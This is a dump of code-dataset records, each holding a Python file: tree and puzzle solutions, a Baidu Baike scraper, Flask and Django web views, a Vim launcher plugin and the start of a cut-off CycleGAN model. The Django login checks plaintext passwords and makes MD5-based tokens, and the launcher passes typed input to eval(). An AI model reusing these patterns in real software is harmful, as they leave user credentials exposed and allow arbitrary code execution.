ax3.set_xlabel('door opening fraction')\n # # ax3.set_xlim([0,1])\n\n # if save:\n # save_loc = '/home/tdh17/Documents/BOX/NCS Project/models/stochastic_model/figures/'\n # savepdf_tex(fig=fig1, fig_loc=save_loc,\n # name=f'winter_q_compare_door_analysis_full_{time_to_get_results.days}d_{str(wind_dir).replace(\".\",\"-\")}deg')\n \n # else:\n # plt.show()\n # plt.close()\n\n\n","sub_path":"plot_people_movement.py","file_name":"plot_people_movement.py","file_ext":"py","file_size_in_byte":8229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"633035534","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# --------------------------------------\n# DATE: 2018/2/28\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n :type sum: int\n \"\"\"\n\n def hasPathSum(self, root, sum):\n if root == None:\n return False\n if root.left == None and root.right == None:\n return root.val == sum\n return self.hasPathSum(root.left, sum - root.val) or self.hasPathSum(root.right, sum - root.val)\n\n\nif __name__ == \"__main__\":\n root = TreeNode(5)\n root.left, root.right = TreeNode(4), TreeNode(8)\n root.left.left, root.right.left, root.right.right = TreeNode(11), TreeNode(13), TreeNode(4)\n root.left.left.left, root.left.left.right, root.right.right.right = TreeNode(7), TreeNode(2), TreeNode(1)\n print(Solution().hasPathSum(root, 22))\n","sub_path":"binary_tree/solve_tree_problems_recursively/path_sum.py","file_name":"path_sum.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"166549661","text":"# -*- coding: utf-8 -*- \n# @Time : 2019/12/9 16:24\n# @Author : hangzhouwh \n# @Email: hangzhouwh@gmail.com\n# @File : baidu_artist.py \n# @Software: PyCharm\nimport re\nimport time\n\nimport scrapy\n\nfrom music163.items import BaikeArtistItem\nfrom music163.tool import json_tool\n\nartist_count = 0\nrequest_count = 0\n\n\nclass BaiduArtistSpider(scrapy.Spider):\n\tname = 'baidu_artist'\n\tallowed_domains = ['https://baike.baidu.com/']\n\n\tdef start_requests(self):\n\t\tglobal request_count\n\n\t\tcodes = [1001, 1002, 1003]\n\t\tfor code in codes:\n\t\t\tfile = 'D:\\\\WorkSpace\\\\Pycharm\\\\music163\\\\music163\\\\data\\\\artist\\\\artist_' + str(code) + '.json'\n\t\t\tartist_data = json_tool.load_json(file)\n\n\t\t\tfor artist in artist_data:\n\t\t\t\trequest_count += 1\n\t\t\t\tprint(\"发送Request: \", request_count)\n\t\t\t\t# if request_count % 1000 == 0:\n\t\t\t\t# \ttime.sleep(5)\n\n\t\t\t\tartist_id = artist['artist_id']\n\t\t\t\tartist_name = artist['artist_name']\n\t\t\t\turl = 'https://baike.baidu.com/item/' + str(artist_name)\n\t\t\t\tyield scrapy.Request(url=url, meta={'artist_id': artist_id, 'artist_name':artist_name}, dont_filter=True)\n\n\tdef parse(self, response):\n\t\tbaike_artist_item = BaikeArtistItem()\n\n\t\tartist_id = response.meta['artist_id']\n\t\tartist_name = response.meta['artist_name']\n\t\t# artist_name # 中文名\n\t\t# nationality # 国籍\n\t\t# nation # 民族\n\t\t# occupation # 职业\n\t\t# birthday # 出生日期\n\t\t# IBEC # 经济公司\n\t\t# is_changed_name # 是否改过名(有原名)\n\t\t# university # 毕业院校\n\n\t\tattr_name = response.xpath('//dt[@class=\"basicInfo-item name\"]//text()').extract() # 属性名称\n\t\tattr_value_selector = response.xpath('//dd[@class=\"basicInfo-item value\"]') # 
属性值选择器\n\t\tattr_value = attr_value_selector.xpath('string(.)').extract() # 属性值\n\n\t\tattr_name_list = []\n\t\tattr_value_list = []\n\n\t\tpattern = r'^\\[\\d{1,2}]$'\n\n\t\tfor i in range(len(attr_name)):\n\t\t\tattr_name[i] = attr_name[i].replace(\"\\xa0\", \"\")\n\n\t\t\t# 删除重复项\n\t\t\tif '展开' in attr_value[i] and '收起' in attr_value[i]:\n\t\t\t\tattr_value[i] = 'null'\n\n\t\t\tcut_txt = attr_value[i].replace(\"\\xa0\", \"\")\n\t\t\ttxt_list = re.split(\"、|\\n\", cut_txt)\n\n\t\t\tfor j in range(len(txt_list)):\n\t\t\t\tif '' in txt_list:\n\t\t\t\t\ttxt_list.remove('')\n\t\t\t\tif '展开' in txt_list:\n\t\t\t\t\ttxt_list.remove('展开')\n\t\t\t\tif '收起' in txt_list:\n\t\t\t\t\ttxt_list.remove('收起')\n\t\t\t\tfor txt in txt_list:\n\t\t\t\t\tif re.match(pattern, txt):\n\t\t\t\t\t\ttxt_list.remove(txt)\n\n\t\t\tif attr_value[i] != 'null':\n\t\t\t\tattr_name_list.append(attr_name[i])\n\t\t\t\tattr_value_list.append(txt_list)\n\n\t\tbaike_artist_item['artist_id'] = artist_id\n\t\tbaike_artist_item['artist_name'] = artist_name\n\t\tbaike_artist_item['attr_name'] = attr_name_list\n\t\tbaike_artist_item['attr_value'] = attr_value_list\n\n\t\tglobal artist_count\n\t\tartist_count = artist_count + 1\n\t\tprint(\"爬取歌手百科信息: \", artist_count)\n\n\t\tyield baike_artist_item\n","sub_path":"music163/spiders/baidu_artist.py","file_name":"baidu_artist.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"271114841","text":"def findLoop(arr):\n checked = []\n i = 0\n acc = 0\n while i not in checked:\n checked.append(i)\n if arr[i][0] == 'nop':\n i+=1\n continue\n if arr[i][0] == 'acc':\n acc += int(arr[i][1])\n i+=1\n continue\n if arr[i][0] == 'jmp':\n i += int(arr[i][1])\n continue\n return acc\n\n#===============================================================================\ninputFile = open(\"input.txt\", 'r')\narr = []\nfor line in inputFile:\n line = line.split()\n arr.append(line)\ninputFile.close()\n\nprint(findLoop(arr))\n","sub_path":"day8/day8.1.py","file_name":"day8.1.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"162534945","text":"import adaboost\nimport matplotlib.pyplot as plt\ndataMat,classLabels=adaboost.loadSimpData()\n\nxcord0=[]\nycord0=[]\nxcord1=[]\nycord1=[]\n\nfor i in range(len(classLabels)):\n if classLabels[i]==-1:\n xcord0.append(dataMat[i,0])\n ycord0.append(dataMat[i,1])\n elif classLabels[i]==1:\n xcord1.append(dataMat[i,0])\n ycord1.append(dataMat[i,1])\n\nplt.figure()\nplt.xlim(0.8,2.2)\nplt.ylim(0.8,2.2)\nplt.scatter(xcord0,ycord0,marker='s')\nplt.scatter(xcord1,ycord1,marker='o')\n\nplt.show()\n","sub_path":"AdaBoost/adaplot.py","file_name":"adaplot.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"141766410","text":"#coding:utf8\nfrom . 
import home\nfrom flask import render_template, session, request\nfrom app.models import Adminuser, Article, CaesarCipher, Category, DataStructure, Quotation, db\nfrom app.common.redis import get_article,get_algorithm_detail, get_quotation, get_index\nfrom sqlalchemy import func, or_, not_\nfrom app.selfFunction import is_int\nimport redis\n\n\n@home.route(\"/\")\ndef index():\n res = get_index()\n if not res:\n return render_template('home/none.html', res=res)\n return render_template('home/index.html', res=res, h1='很巧,你就这样来了', h3='', style='header-six')\n\n\n@home.route(\"/Category/\")\ndef category(id):\n res = Article.query.filter(Article.type == id, Article.status == 1).all()\n num = 1\n for i in res:\n i.num = num\n i.second = '0.' + str(num)\n if 8 == num:\n num = 1\n else:\n num += 1\n if not res:\n return render_template('home/none.html', res=res)\n return render_template('home/index.html', res=res, h1='假如有人问我的烦恼', h3='我不敢说出你的名字', style='header-five')\n\n\n@home.route(\"/Article/\")\ndef article(id):\n if 0 == is_int(id):\n return render_template('common/404.html')\n res = get_article(id)\n if not res:\n return render_template('common/404.html')\n return render_template('home/article.html', res=res)\n\n\n@home.route(\"/Algorithm\")\ndef Algorithm():\n res = DataStructure.query.with_entities(DataStructure.difficulty, DataStructure.id, DataStructure.title, Category.name, Category.id.label('categoryId'))\\\n .join(Category, DataStructure.language == Category.id).all()\n data = CaesarCipher.query.filter(CaesarCipher.status == 1).order_by(func.rand()).first()\n # count = db.session.query(DataStructure.difficulty, func.count('*').label(\"user_count\"))\\\n # .group_by(DataStructure.difficulty).all()\n # sumArg = 0\n # percent = []\n # if len(count)!=0:\n # for i in count:\n # sumArg += i[1]\n # # print(i)\n # for i in count:\n # single = ()\n # # print(round(i[1]/sumArg, 3))\n # single = (i[0], str(round(i[1]/sumArg, 3)*100)+'%')\n # percent.append(single)\n # return render_template('home/algorithm.html', res=res, sum=sumArg, percent=percent)\n\n return render_template('home/algorithm.html', res=res, data=data)\n\n\n@home.route(\"/AlgorithmCategory/\")\ndef AlgorithmCategory(id):\n res = DataStructure.query.with_entities(DataStructure.difficulty, DataStructure.id, DataStructure.title, Category.name, Category.id.label('categoryId'))\\\n .join(Category, DataStructure.language == Category.id).filter(DataStructure.language == id).all()\n data = CaesarCipher.query.filter(CaesarCipher.status == 1).order_by(func.rand()).first()\n\n # count = db.session.query(DataStructure.difficulty, func.count('*').label(\"user_count\")).group_by(\n # DataStructure.difficulty).all()\n # sumArg = 0\n # percent = []\n # if len(count) != 0:\n # for i in count:\n # sumArg += i[1]\n\n return render_template('home/algorithm.html', res=res, data=data)\n\n\n@home.route(\"/AlgorithmDetail/\")\ndef AlgorithmDetail(id):\n if 0 == is_int(id):\n return render_template('common/404.html')\n # res = DataStructure.query\\\n # .with_entities(DataStructure.id, DataStructure.title, DataStructure.answer, DataStructure.question, DataStructure.difficulty, Category.name)\\\n # .join(Category, DataStructure.language == Category.id).filter(DataStructure.id == id).first()\n res = get_algorithm_detail(id)\n if not res:\n return render_template('common/404.html')\n return render_template('home/algorithmDetail.html', res=res)\n\n\n@home.route(\"/quotation\")\ndef quotationIndex():\n res = get_quotation(0)\n # res = 
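# Sketch of the validate-then-404 pattern these routes follow, assuming
# Flask; the blueprint here renders its own common/404.html through the
# handlers further down, and abort(404) is the shortest route into such a
# handler. article_demo is a hypothetical name, not one of the views above.
from flask import Flask, abort

app = Flask(__name__)

@app.route("/Article/<id>")
def article_demo(id):
    if not id.isdigit():          # mirrors the `0 == is_int(id)` guard
        abort(404)
    return "article %d" % int(id)
# (an <int:id> converter would push the same check into routing itself)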
Quotation.query.filter(Quotation.status == 1).all()\n return render_template('home/quotation.html',res=res)\n\n\n@home.app_errorhandler(404)\ndef miss(e):\n return render_template('common/404.html'),404\n\n\n@home.app_errorhandler(500)\ndef error(e):\n return render_template('common/404.html'),500\n","sub_path":"app/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34220005","text":"# -*- coding: utf-8 -*-\n\"\"\"\nozzy.launcher\n~~~~~~~~~~~~~\n\nThis module defines the class that implements the launcher.\n\"\"\"\n\nfrom __future__ import division\n\nimport os\nimport re\nimport vim\nfrom math import *\n\nimport ozzy.input\nimport ozzy.utils.misc\nimport ozzy.utils.settings\n\n\nclass Launcher:\n\n def __init__(self, plug, data_layer):\n self.settings = ozzy.utils.settings\n self.misc = ozzy.utils.misc\n\n self.plug = plug\n self.data = data_layer\n self.name = 'ozzy.launcher'\n self.prompt = self.settings.get('prompt')\n self.input_so_far = ''\n self.launcher_win = None\n self.curr_pos = None\n self.curr_entries_number = 0\n self.curr_file = None\n self.curr_win = None\n self.mapper = {}\n self.orig_settings = {}\n self.max_entries = self.settings.get('max_entries', int)\n self.RE_MATH = re.compile('(\\d+|\\+|\\*|\\/|-)')\n\n # setup highlight groups\n self.setup_colors()\n\n def setup_colors(self):\n \"\"\"Setups highlight groups according to the current settings.\"\"\"\n\n paths = self.settings.get(\"paths_color\")\n matches = self.settings.get(\"matches_color\")\n dirs = self.settings.get(\"last_dir_color\")\n\n if vim.eval(\"&background\") == 'dark':\n p = self.settings.get(\"paths_color_darkbg\")\n path = p if p else paths\n m = self.settings.get(\"matches_color_darkbg\")\n matches = m if m else matches\n d = self.settings.get(\"last_dir_color_darkbg\")\n dirs = d if d else dirs\n\n for g, c in ((\"Paths\", paths), (\"Matches\", matches), (\"Dirs\", dirs)):\n if \"=\" not in c:\n # a group is found\n vim.command(\"hi link Ozzy{0} {1}\".format(g, c))\n else:\n vim.command(\"hi Ozzy{0} {1}\".format(g, c))\n\n def restore_old_settings(self):\n \"\"\"Restore original settings.\"\"\"\n specials = (\"@/\",)\n for sett, val in self.orig_settings.items():\n if sett in specials:\n vim.command(\"\"\"let {}=\"{}\" \"\"\".format(\n sett, val.replace('\"', '\\\\\"')))\n else:\n vim.command('set {0}={1}'.format(sett, val))\n\n def reset_launcher(self):\n self.input_so_far = ''\n self.launcher_win = None\n self.curr_pos = None\n self.curr_entries_number = 0\n self.curr_file = None\n self.mapper = {}\n\n def setup_buffer(self):\n \"\"\"To setup buffer properties of the matches list window.\"\"\"\n vim.command(\"setlocal buftype=nofile\")\n vim.command(\"setlocal bufhidden=wipe\")\n vim.command(\"setlocal encoding=utf-8\")\n vim.command(\"setlocal nobuflisted\")\n vim.command(\"setlocal noundofile\")\n vim.command(\"setlocal nobackup\")\n vim.command(\"setlocal noswapfile\")\n vim.command(\"setlocal nowrap\")\n vim.command(\"setlocal nonumber\")\n vim.command(\"setlocal cursorline\")\n vim.command(\"setlocal nolist\")\n vim.command(\"setlocal nospell\")\n vim.command(\"setlocal textwidth=0\")\n vim.command('setlocal colorcolumn=0')\n vim.command(\"try|setlocal norelativenumber|catch|endtry\")\n self.orig_settings['@/'] = vim.eval('@/')\n vim.command('let @/ = \"\"')\n self.orig_settings['laststatus'] = vim.eval('&laststatus')\n vim.command('setlocal laststatus=0')\n 
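# Sketch of the save-then-restore idea behind orig_settings, stdlib only:
# snapshot the values about to be changed, apply the overrides, and put the
# originals back on exit even if the body raises.
from contextlib import contextmanager

@contextmanager
def temporary(settings, **overrides):
    saved = {k: settings[k] for k in overrides}
    settings.update(overrides)
    try:
        yield settings
    finally:
        settings.update(saved)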
self.orig_settings['guicursor'] = vim.eval('&guicursor')\n vim.command(\"setlocal guicursor=a:hor5-Cursor-blinkwait100\")\n\n def highlight(self, max_len, input):\n vim.command(\"syntax clear\")\n vim.command('syn match OzzyPaths /\\%>{0}c./'.format(max_len + 3))\n if input:\n vim.command(\"syn match OzzyMatches /\\%<{0}v\\c{1}/\".format(\n max_len + 2, input.encode('utf-8', 'ignore')))\n\n def close_launcher(self):\n \"\"\"To close the matches list window.\"\"\"\n self.misc.go_to_win(self.launcher_win)\n self.reset_launcher()\n self.restore_old_settings()\n vim.command('q')\n if self.curr_win:\n self.misc.go_to_win(self.curr_win)\n\n def open_launcher(self):\n \"\"\"To open the matches list window.\"\"\"\n vim.command('silent! botright split {0}'.format(self.name))\n self.setup_buffer()\n return vim.eval(\"bufwinnr('{0}')\".format(self.name))\n\n def update_launcher(self):\n \"\"\"To update the matches list content.\"\"\"\n if not self.launcher_win:\n self.launcher_win = self.open_launcher()\n\n self.misc.go_to_win(self.launcher_win)\n self.misc.set_buffer(None)\n\n if self.is_arithmetic_expr(self.input_so_far):\n\n result = self.eval_arithmetic_expr(self.input_so_far)\n\n if result:\n res = ' = {0}'.format(result)\n else:\n res = ' = ...'\n\n vim.command('syntax clear')\n self.misc.set_buffer([res])\n vim.current.window.height = 1\n self.curr_pos = 0\n\n else:\n\n scoreboard = self.data.make_scoreboard(\n self.input_so_far, exclude=self.curr_file)\n data = [path for score, path in sorted(scoreboard, reverse=True)]\n\n if data:\n\n data = data[-self.max_entries:]\n m = max(len(os.path.basename(path)) for path in data)\n self.mapper = dict(enumerate(data))\n self.misc.set_buffer([self.format_record(p, m) for p in data])\n vim.current.window.height = len(data)\n self.highlight(m, self.input_so_far)\n self.format_curr_line(m)\n\n else:\n\n vim.command('syntax clear')\n self.misc.set_buffer([' nothing found...'])\n vim.current.window.height = 1\n self.curr_pos = 0\n\n if self.curr_pos is not None:\n vim.current.window.cursor = (self.curr_pos + 1, 1)\n self.curr_entries_number = vim.current.window.height\n\n vim.command(\"normal! 0\")\n\n def is_arithmetic_expr(self, expr):\n \"\"\"To detect an arithmetic expression (very naive).\"\"\"\n if self.RE_MATH.search(expr):\n return True\n\n def eval_arithmetic_expr(self, expr):\n \"\"\"To evaluate an arithmetic expression.\"\"\"\n try:\n return eval(expr)\n except:\n return None\n\n def format_record(self, path, max_len):\n \"\"\"To format a match displayed in the matches list window.\"\"\"\n path = path.encode('utf-8')\n path = path.replace(os.path.realpath(os.path.expanduser('~')), '~')\n\n if self.settings.get(\"show_file_names\", bool):\n full_path = path\n else:\n full_path = os.path.dirname(path)\n\n return ' {0: <{1}}{2}'.format(\n os.path.basename(path), max_len + 4, full_path)\n\n def format_curr_line(self, max_len):\n \"\"\"To format the current line in the laucher window.\"\"\"\n if self.curr_pos is None:\n self.curr_pos = len(vim.current.buffer) - 1\n line = vim.current.buffer[self.curr_pos]\n vim.current.buffer[self.curr_pos] = '▸ ' + line[2:]\n\n def open_selected_file(self):\n \"\"\"To open the file on the selected line.\"\"\"\n path = self.mapper.get(self.curr_pos)\n self.close_launcher()\n vim.command('sil! 
e {0}'.format(self.misc.escape_spaces(path)))\n\n def delete_selected_file(self):\n \"\"\"To delete the selected file from the database.\"\"\"\n path = self.mapper.get(self.curr_pos)\n if path.startswith('~'):\n path = os.path.join(os.path.expanduser('~'), path[2:])\n\n self.data.delete_file(path)\n\n def open(self):\n \"\"\"To open the launcher.\"\"\"\n # Remember the currently open file so that we can exclude it\n # from the matches\n self.curr_file = vim.current.buffer.name\n self.curr_win = self.misc.winnr()\n\n # This first call opens the list of matches even though the user\n # didn't give any character as input\n self.update_launcher()\n self.misc.redraw()\n\n input = ozzy.input.Input()\n # Start the input loop\n while True:\n\n if self.plug.mode:\n mode = self.settings.get('project_mode_flag')\n else:\n mode = self.settings.get('global_mode_flag')\n\n # Display the prompt and the text the user has been typed so far\n prompt = \"\"\"{0}{1}{2}\"\"\".format(\n mode, self.prompt, self.input_so_far.encode('utf-8'))\n prompt = prompt.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', '\\\\\"')\n vim.command(\"echo \\\"{0}\\\"\".format(prompt))\n\n # Get the next character\n input.get()\n\n if (input.RETURN or input.CTRL and input.CHAR == 'o'\n or input.CTRL and input.CHAR == 'e'):\n # The user have chosen the currently selected match\n self.open_selected_file()\n self.data.cache = []\n break\n\n elif input.BS:\n # This acts just like the normal backspace key\n self.input_so_far = u\"{0}\".format(self.input_so_far)[:-1]\n # Reset the position of the selection in the matches list\n # because the list has to be rebuilt\n self.curr_pos = None\n self.data.cache = []\n\n elif input.ESC or input.INTERRUPT:\n # The user want to close the launcher\n self.close_launcher()\n self.data.cache = []\n self.misc.redraw()\n break\n\n elif input.UP or input.TAB or input.CTRL and input.CHAR == 'k':\n # Move up in the matches list\n last_index = len(vim.current.buffer) - 1\n if self.curr_pos == 0:\n self.curr_pos = last_index\n else:\n self.curr_pos -= 1\n\n elif input.DOWN or input.CTRL and input.CHAR == 'j':\n # Move down in the matches list\n last_index = len(vim.current.buffer) - 1\n if self.curr_pos == last_index:\n self.curr_pos = 0\n else:\n self.curr_pos += 1\n\n elif input.CTRL and input.CHAR == 'd':\n self.delete_selected_file()\n self.curr_pos = None\n self.data.cache = []\n\n elif input.CTRL and input.CHAR == 'u':\n # clear the current search\n self.input_so_far = ''\n self.curr_pos = None\n self.data.cache = []\n\n elif input.CHAR:\n # A printable character has been pressed. 
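# The UP/DOWN branches above wrap the selection around both ends of the
# matches list; modular arithmetic collapses the two edge cases into one
# expression (pure Python, no assumptions):
def wrap_move(pos, delta, n):
    return (pos + delta) % n

assert wrap_move(0, -1, 5) == 4    # up from the top lands on the bottom
assert wrap_move(4, +1, 5) == 0    # down from the bottom lands on the top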
We have to remember\n # it so that in the next loop we can display exactly what the\n # user has been typed so far\n self.input_so_far += input.CHAR.decode('utf-8')\n\n # Reset the position of the selection in the matches list\n # because the list has to be rebuilt\n self.curr_pos = None\n\n else:\n self.misc.redraw()\n continue\n\n self.update_launcher()\n\n # Clean the command line\n self.misc.redraw()\n","sub_path":"ozzy-3.3/plugin/ozzy/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":11311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"498039683","text":"code_solution=[\"UTF-8\",\"cp1254\",\"latin-1\",\"ASCII\"]\r\n\r\ncharacter=input(\"Enter a character: \")\r\n\r\nfor x in code_solution:\r\n\ttry:\r\n\t\tprint(\"'{}'' represent with {}, be {} and {} number\".format(character,x,character.encode(x),ord(character)))\r\n\r\n\texcept UnicodeEncodeError:\r\n\t\tprint(\"'{}' can't represent with {}!\".format(character,x))","sub_path":"en-US_chr_enc.py","file_name":"en-US_chr_enc.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"520263093","text":"# encoding=utf-8\nimport hashlib\nimport time\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.urls import reverse\n\nfrom APP_BasicInfo.models import InfoStudent, InfoTeacher, InfoAdmin\n# from Cyl_FaceRecognition import LOGIN_FLAG\n# from Middlewares import login_flag\nfrom Other_Code.view_utils import view_utils as utils\nfrom Other_Code.view_utils.view_utils import try_log\n\n\ndef return_anew(request, uname='', upad='', ucod=''):\n \"\"\"\n GET提交时执行 生成验证码并返回登陆页面\n :param request:\n :param uname:\n :param upad:\n :param ucod:\n :return:\n \"\"\"\n data = {\n 'uname': uname,\n 'upad': upad,\n 'ucod': ucod,\n }\n name = utils.createCode() # 画二维码\n request.session['yzmname'] = name\n print(name)\n return render(request, 'login.html', context=data)\n\n\ndef create_token(request, username, radio):\n \"\"\"\n 创建token 使用ip和用户名和使时间构成唯一的令牌\n :param request:\n :param username:\n :param radio:\n :return:\n \"\"\"\n ip = request.META.get(\"REMOTE_ADDR\")\n c_time = time.ctime()\n\n r = username\n\n return radio + hashlib.new(\"md5\", (ip + c_time + r).encode(\"utf-8\")).hexdigest()\n\n\ndef login(request):\n uname = ''\n unum = ''\n img_path = ''\n inf = ''\n yzm = 0\n data ={}\n request.session['viflag'] = '1' # 是否开局拦截\n if request.method == 'GET':\n return return_anew(request)\n elif request.method == 'POST':\n yzmname = request.session.get('yzmname')\n da = request.POST\n uco = da.get('usercode').lower()\n try:\n yzm = yzmname.lower()\n except Exception as e:\n yzm = '0'\n if uco != yzm:\n return return_anew(request, ucod='验证码错误')\n elif uco == yzm:\n username = da.get('username')\n userpasswd = da.get('userpassword')\n radio = da.get('radio')\n db_login = ''\n if radio == 'radio1':\n db_login = InfoStudent.objects.filter(st_login_id=username).filter(st_passwd=userpasswd)\n elif radio == 'radio2':\n db_login = InfoTeacher.objects.filter(te_login_id=username).filter(te_passwd=userpasswd)\n elif radio == 'radio3':\n db_login = InfoAdmin.objects.filter(admin_number=username).filter(admin_passwd=userpasswd)\n if db_login.exists():\n token = create_token(request, username, radio)\n db_login = db_login.first()\n if radio == 'radio1':\n db_login.st_token = token\n db_login.save()\n uname = db_login.st_name\n unum = db_login.st_id\n img_path = 
db_login.st_pic_path\n inf = 'student'\n elif radio == 'radio2':\n db_login.te_token = token\n db_login.save()\n uname = db_login.te_name\n unum = db_login.te_id\n img_path = db_login.te_pic_path\n inf = 'teacher'\n elif radio == 'radio3':\n db_login.admin_token = token\n db_login.save()\n uname = db_login.admin_number\n unum = uname\n img_path = db_login.admin_pic_path\n inf = 'admin'\n response = redirect(reverse('app_login:welcome'))\n response.set_cookie('token', token)\n request.session['data'] = data\n request.session['inf'] = inf\n return response\n else:\n return return_anew(request, upad='账号或密码错误')\n\ndef gowelcome(request): # 0 不刷新\n data = request.session['data']\n data['nav_path']['nav_path_one'] = '主页'\n return render(request, 'welcome.html', context=data)\n\ndef welcome(request):\n inf = ''\n try:\n inf = request.session['inf']\n except Exception as e:\n try_log()\n data = request.session['data']\n data['nav_path']['nav_path_one'] = '主页'\n if inf == 'teacher':\n return render(request, 'teacher_welcome.html', context=data)\n elif inf == 'student':\n return render(request, 'student_welcome.html', context=data)\n elif inf == 'admin':\n return render(request, 'admin_welcome.html', context=data)\n # return gowelcome(request)\n\n # data = request.session['data']\n # data['nav_path']['nav_path_one'] = '主页'\n # return render(request, 'welcome.html', context=data)\n\n\n\ndef loginout(request):\n\n token = request.COOKIES.get('token')\n iden = str(token)[5:6]\n db = 0\n try:\n if iden == '1':\n db = InfoStudent.objects.get(st_token=token)\n db.st_token = ' '\n elif iden == '2':\n db = InfoTeacher.objects.get(te_token=token)\n db.te_token = ' '\n elif iden == '3':\n db = InfoAdmin.objects.get(admin_token=token)\n db.admin_token = ' '\n\n db.save()\n except Exception as e:\n pass\n request.session.flush()\n response = redirect(reverse('app_login:login'))\n response.delete_cookie('token')\n return response\n\n\ndef skip_welcome(request):\n\n return gowelcome(request)","sub_path":"3.人工智能/基于深度学习的人脸识别系统/Cyl_FaceRecognition/APP_Login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"313033707","text":"import sys\nimport torch\nimport itertools\nfrom util.image_pool import ImagePool\nfrom util.losses import L1_Charbonnier_loss\nfrom .base_model import BaseModel\nfrom . import networks\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.nn.functional as F\nimport os\nfrom models.vgg_perceptual_loss import VGGPerceptualLoss\n#import kornia.augmentation\n#import sys\n\nimport random\nimport math\nfrom torch import distributed as dist\n\nfrom .modules import loss\n\nfrom util.util import gaussian\n\nclass CycleGANSemanticMaskSty2Model(BaseModel):\n #def name(self):\n # return 'CycleGANModel'\n\n # new, copied from cyclegansemantic model\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n \"\"\"Add new dataset-specific options, and rewrite default values for existing options.\n\n Parameters:\n parser -- original option parser\n is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.\n\n Returns:\n the modified parser.\n\n For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.\n A (source domain), B (target domain).\n Generators: G_A: A -> B; G_B: B -> A.\n Discriminators: D_A: G_A(A) vs. 
B; D_B: G_B(B) vs. A.\n Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)\n Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)\n Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 \"Photo generation from paintings\" in the paper)\n Dropout is not used in the original CycleGAN paper.\n \"\"\"\n parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout\n if is_train:\n parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')\n parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')\n parser.add_argument('--lambda_identity', type=float, default=0.5, help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')\n parser.add_argument('--lambda_G', type=float, default=1.0, help='weight for generator loss')\n parser.add_argument('--out_mask', action='store_true', help='use loss out mask')\n parser.add_argument('--lambda_out_mask', type=float, default=10.0, help='weight for loss out mask')\n parser.add_argument('--loss_out_mask', type=str, default='L1', help='loss mask')\n parser.add_argument('--charbonnier_eps', type=float, default=1e-6, help='Charbonnier loss epsilon value')\n parser.add_argument('--train_f_s_B', action='store_true', help='if true f_s will be trained not only on domain A but also on domain B')\n parser.add_argument('--fs_light',action='store_true', help='whether to use a light (unet) network for f_s')\n parser.add_argument('--lr_f_s', type=float, default=0.0002, help='f_s learning rate')\n parser.add_argument('--D_noise', action='store_true', help='whether to add instance noise to discriminator inputs')\n parser.add_argument('--D_label_smooth', action='store_true', help='whether to use one-sided label smoothing with discriminator')\n parser.add_argument('--rec_noise', type=float, default=0.0, help='whether to add noise to reconstruction')\n parser.add_argument('--wplus', action='store_true', help='whether to work in W+ latent space')\n parser.add_argument('--wskip', action='store_true', help='whether to use skip connections to latent wplus heads')\n parser.add_argument('--truncation',type=float,default=1,help='whether to use truncation trick (< 1)')\n parser.add_argument('--decoder_size', type=int, default=512)\n parser.add_argument('--d_reg_every', type=int, default=16,help='regularize discriminator each x iterations, no reg if set to 0')\n parser.add_argument('--g_reg_every', type=int, default=4,help='regularize decider sty2 each x iterations, no reg if set to 0')\n parser.add_argument('--r1', type=float, default=10)\n parser.add_argument('--mixing', type=float, default=0.9)\n parser.add_argument('--path_batch_shrink', type=int, default=2)\n parser.add_argument('--path_regularize', type=float, default=2)\n parser.add_argument('--no_init_weight_D_sty2', action='store_true')\n parser.add_argument('--no_init_weight_dec_sty2', action='store_true')\n parser.add_argument('--no_init_weight_G', action='store_true')\n parser.add_argument('--load_weight_decoder', action='store_true')\n parser.add_argument('--percept_loss', action='store_true', help='whether to use perceptual loss for reconstruction and identity')\n 
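# --- Editor's aside (hedged illustration; not part of the original record) ---
# The class docstring above states the CycleGAN objective in prose. The tiny
# helper below restates those loss terms as code; every name here is a
# hypothetical stand-in (the real model routes netG_A/netG_B through StyleGAN2
# decoders), so read it as a sketch of the formulas, not as this repository's API.
def _cyclegan_objective_sketch(G_A, G_B, real_A, real_B,
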